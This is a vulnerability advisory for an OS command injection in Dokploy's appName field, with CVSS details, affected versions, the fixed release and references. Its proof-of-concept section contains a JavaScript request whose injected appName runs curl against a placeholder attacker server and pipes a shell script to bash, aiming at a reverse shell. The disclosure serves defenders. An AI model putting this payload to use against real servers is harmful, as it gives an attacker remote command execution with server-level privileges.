Security Vulnerability Report
CVE-2026-27130 CVSS 9.9 CRITICAL

CVE-2026-27130

Published: 2026-05-18 21:16:40
Last Modified: 2026-05-19 17:16:22

Description

Dokploy is a free, self-hostable Platform as a Service (PaaS). Versions 0.26.6 and below have OS command injection through the appName parameter. Three chained issues cause this problem: inadequate input sanitization, lack of schema validation, and direct shell interpolation. User-controlled application names are passed through inadequate sanitization (the cleanAppName function only replaces spaces and converts to lowercase) before being interpolated directly into shell commands executed via execAsync() and execAsyncRemote(). An authenticated attacker can inject shell metacharacters (e.g., ;, $(), backticks, |, &) in the appName field during application creation, which are then executed with server-level privileges when service operations (start, stop, remove, scale) are triggered. This issue has been resolved in version 0.26.7.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Exploitability Score
3.1
Impact Score
6.0
Weakness
CWE-78 (OS Command Injection)

Configurations (Affected Products)

Dokploy <= 0.26.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// PoC for CVE-2026-27130
// Attacker injects a payload into the appName parameter during application creation.
// The payload attempts to execute a reverse shell.
const maliciousAppName = "testapp; $(curl http://attacker-server/shell.sh | bash) #";

// Hypothetical HTTP Request to create the application
fetch('https://target-dokploy.com/api/application', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <ATTACKER_TOKEN>'
  },
  body: JSON.stringify({
    appName: maliciousAppName, // Vulnerable parameter
    // ... other necessary fields
  })
});

// Triggering the execution
// When the admin or system triggers a service operation (e.g., start/stop),
// the command executed by the server might look like:
// docker-compose up -d "testapp; $(curl http://attacker-server/shell.sh | bash) #"
// This results in the execution of the injected curl command.
```

References

Commit: https://github.com/Dokploy/dokploy/commit/960892fd8dcf12b7a73a00edaa1b7090fca860c7
GitHub Security Advisory: https://github.com/Dokploy/dokploy/security/advisories/GHSA-fcgq-jjfg-hrhj

Weakness: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)